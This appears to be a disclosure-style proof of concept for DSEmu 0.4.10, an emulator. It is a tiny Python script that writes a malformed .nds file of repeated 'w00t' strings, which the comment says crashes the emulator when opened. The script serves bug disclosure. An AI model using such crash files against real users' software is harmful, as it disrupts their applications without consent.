#!/usr/bin/env python #DSEmu 0.4.10 (.nds) local crash #Software Link: http://double.co.nz/nintendo_ds/dsemu-0.4.10.zip #Author: l3D #Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com #Open the file, and after 4 seconds the application should crash. blah=open('crash.nds', 'w') blah.write('w00t'*12) blah.close()